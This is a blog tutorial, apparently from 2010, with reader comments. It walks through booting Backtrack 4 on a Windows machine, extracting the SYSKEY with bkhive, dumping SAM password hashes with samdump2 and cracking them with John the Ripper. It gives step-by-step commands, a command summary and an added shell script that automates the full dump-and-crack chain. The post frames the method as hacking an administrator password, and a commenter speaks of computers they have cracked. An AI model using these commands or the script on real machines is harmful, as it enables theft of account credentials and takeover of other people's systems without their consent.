Retrieve Windows password using Samdump2 and John with Backtrack4

Earlier I posted on "How to hack Windows administrator password" using Backtrack. This is the final post of that series, where we see how to recover the password without resetting it: instead of overwriting the account's hash on disk, we copy the password hashes out of the SAM hive and crack them offline, so the Windows installation itself is left untouched.

Here I will be using Backtrack 4 booted from a USB stick, but you can also boot it from a CD.

Requirements:

1. Backtrack 4 ISO

2. UNetbootin (to write the ISO to the USB stick)

If you have any problem installing Backtrack on your USB stick, read here.

Procedure:

Step 1.
With the bootable USB made, reboot the machine and boot Backtrack 4. Log in with username root and password toor, then run startx to bring up the desktop.

Step 2.
Now open a console and run df (disk free) or fdisk -l to find the partition that holds the SAM file of your Windows box. df only lists filesystems that are already mounted, while fdisk -l lists every partition on every disk, so fdisk -l is the one to use when the Windows partition has not been mounted yet. Here I will be using df.
Step 3.
If the desired drive already shows up in the previous step, fine; if not, mount it with mount -t ntfs /dev/sda1 /mnt/sda1 -o force. The mount point must exist, so create it first with mkdir -p /mnt/sda1. The force option is only needed when the volume was not cleanly shut down (for example Windows was hibernated), and you may leave it out. Since we only need to read the hives, adding -o ro to mount the volume read-only is enough and avoids any chance of altering the Windows partition.

Step 4.
The SAM file of Windows lives in the config directory under system32, so we need to be in that directory for the rest of the work. Type cd /mnt/sda1/WINDOWS/system32/config. Note that an NTFS volume mounted under Linux is case sensitive, so the directory names must be typed exactly as they are on disk: on Windows XP the directory is usually WINDOWS, on Vista and later it is Windows, and ls /mnt/sda1 will show you which one you have. Once there, ls should show the two hives this procedure needs: SAM, and system (spelled SYSTEM on newer versions).

Step 5.
Now use bkhive to extract the boot key (the SYSKEY) from the SYSTEM hive. The hashes inside the SAM are encrypted with a key derived from it, which is why samdump2 needs this key file in the next step. Type
bkhive system ~/Desktop/key.txt
where ~/Desktop/key.txt is the path of the key file to be created. Once the command has run, check your desktop to confirm the file is there.

Step 6.
Here we use samdump2 to dump the hashes, using the key file created in the previous step. The command format is samdump2 [samhive path] [keyfile path], so the command to use here is
samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt
where ~/Desktop/SHunk_Hash.txt is the file into which the hashes from the SAM are written, one account per line in pwdump format (username:RID:LM hash:NT hash:::). Check the desktop for the SHunk_Hash.txt file.
Step 7.
To view the hashes, type cat ~/Desktop/SHunk_Hash.txt. Two values in the output are worth recognising: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored for that account (LM hashing disabled, or a password longer than 14 characters), and an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 means the password is blank.
Step 8.
Now change directory to /pentest/password/jtr, where John the Ripper lives on Backtrack 4 (simply typing "john" also drops you into that directory).

Step 9.
Now type ./john ~/Desktop/SHunk_Hash.txt. John the Ripper will try to crack every hash in the file; you can limit it to one account with ./john ~/Desktop/SHunk_Hash.txt --users=[desired username, without the brackets]. Here ~/Desktop/SHunk_Hash.txt is the path of the hash file we created in Step 6. John auto-detects the LM hashes and starts with those; if the LM field is the empty value mentioned in Step 7 there is nothing for the LM cracker to work on, and you must point John at the NT hashes instead with --format=NT (available in the jumbo build of John). Already-cracked passwords can be listed again at any time with ./john --show ~/Desktop/SHunk_Hash.txt.
Command Summary:

1. df

2. mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Optional)

3. cd /mnt/sda1/WINDOWS/system32/config

4. bkhive system ~/Desktop/key.txt

5. samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt

6. cat ~/Desktop/SHunk_Hash.txt (Optional)

7. cd /pentest/password/jtr

8. ./john ~/Desktop/SHunk_Hash.txt

OR

./john ~/Desktop/SHunk_Hash.txt --users=[Desired username without brackets]
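The following script is an added example and is not part of the original post. It wraps Steps 4 to 9 in shell functions, finds the system32/config directory and the hive files case-insensitively (the WINDOWS-versus-Windows problem raised in the comments below), and inspects the dumped hashes so that John is started with the right format instead of guessing. It assumes the Windows volume is already mounted (default /mnt/sda1, as on the page), that bkhive and samdump2 take the two-argument form used in this post (newer samdump2 releases instead take the SYSTEM and SAM hives directly, with no separate bkhive step), and that john is in /pentest/password/jtr. The sample dump at the bottom is constructed with placeholder hex values, not real hashes, apart from the well-known empty LM and NT values.

```shell
#!/bin/sh
# Added example (not from the original post): Steps 4-9 as reusable functions.
# Assumes: Windows volume mounted at /mnt/sda1 (override with the first argument),
# the page's two-argument bkhive/samdump2, and john in /pentest/password/jtr.

PATH="/pentest/password/jtr:$PATH"

# Well-known "empty" values as they appear in samdump2 output.
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # no LM hash stored for the account
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of a blank password

# Locate system32/config regardless of case (WINDOWS vs Windows): an NTFS volume
# mounted under Linux is case sensitive. Prints every match, one per line, so a
# disk that carries two Windows directories shows both.
find_config_dir() {
    find "$1" -maxdepth 3 -type d -ipath '*/windows/system32/config'
}

# Find a hive file inside a config directory, case-insensitively
# (XP names it "system", Vista and later "SYSTEM"). Prints the path or nothing.
find_hive() {
    find "$1" -maxdepth 1 -type f -iname "$2" | head -n 1
}

# Read pwdump-format lines (user:RID:LM:NT:::) on stdin and print
# "<user> <status>", where status is lm+nt, nt-only or empty.
classify_hashes() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF >= 4 {
            lm = tolower($3); nt = tolower($4); st = "lm+nt"
            if (lm == elm) st = "nt-only"   # no LM hash: NoLMHash set or password > 14 chars
            if (nt == ent) st = "empty"     # blank password, nothing to crack
            print $1 " " st
        }'
}

# Pick a john format from classify_hashes output: LM if any account still has
# an LM hash (the quick win), otherwise NT.
john_format() {
    awk '$2 == "lm+nt" { lm = 1 } END { print (lm ? "LM" : "NT") }'
}

# The whole procedure: hives -> boot key -> hashes -> john.
dump_and_crack() {
    mnt="${1:-/mnt/sda1}"
    out="${2:-$HOME/Desktop/SHunk_Hash.txt}"
    cfg=$(find_config_dir "$mnt" | head -n 1)
    if [ -z "$cfg" ]; then
        echo "no system32/config directory under $mnt (wrong partition?)" >&2
        return 1
    fi
    sam=$(find_hive "$cfg" SAM)
    sys=$(find_hive "$cfg" system)
    if [ ! -f "$sam" ] || [ ! -f "$sys" ]; then
        echo "SAM or SYSTEM hive missing in $cfg" >&2
        return 1
    fi
    key=$(mktemp)
    bkhive "$sys" "$key"              # Step 5: boot key (SYSKEY) from the SYSTEM hive
    samdump2 "$sam" "$key" > "$out"   # Step 6: decrypt the hashes into pwdump format
    rm -f "$key"
    fmt=$(classify_hashes < "$out" | john_format)
    john --format="$fmt" "$out"       # Step 9: crack; --format=NT needs the jumbo build
    john --show "$out"
}

# Constructed sample dump with placeholder hex values (not real hashes), used
# only to demonstrate the classification when the script is run without --run.
SAMPLE_DUMP='Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::'

case "${1:-}" in
    --run) shift; dump_and_crack "$@" ;;
    *)     printf '%s\n' "$SAMPLE_DUMP" | classify_hashes ;;
esac
```

Run it as sh dump.sh --run /mnt/sda1 on the booted Backtrack system; without --run it only prints the classification of the constructed sample. The classification step matters because John defaults to the LM hashes it recognises first, and on a box where every account has the empty LM value it would otherwise sit there with nothing to crack.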
Reviewed by Satyajit (Admins, a.k.a. Satosys) on Thursday, December 30, 2010

4 comments:

Aslam said...

Nice, valuable and informative stuff about retrieving Windows passwords using samdump2 and john.
Keep it up regularly please!

Anonymous said...

When I try to move into WINDOWS/System32/config I receive the error "no such file/directory". Yet if I ls -l on the WINDOWS directory I can see the System32 folder, but it is highlighted, as are some other directories.

What does this mean? Is this stopping me from entering the System32/config directory? How can I resolve this?

Thanks a lot.

Anonymous said...

It's Windows/System32/config, not WINDOWS/System32/config. Hope this helps.

Ignoroth said...

Check that you are on the right drive. The last computer I cracked had 2 Windows directories, one named WINDOWS and the other Windows.

2 different directories; the one I had to use was WINDOWS.
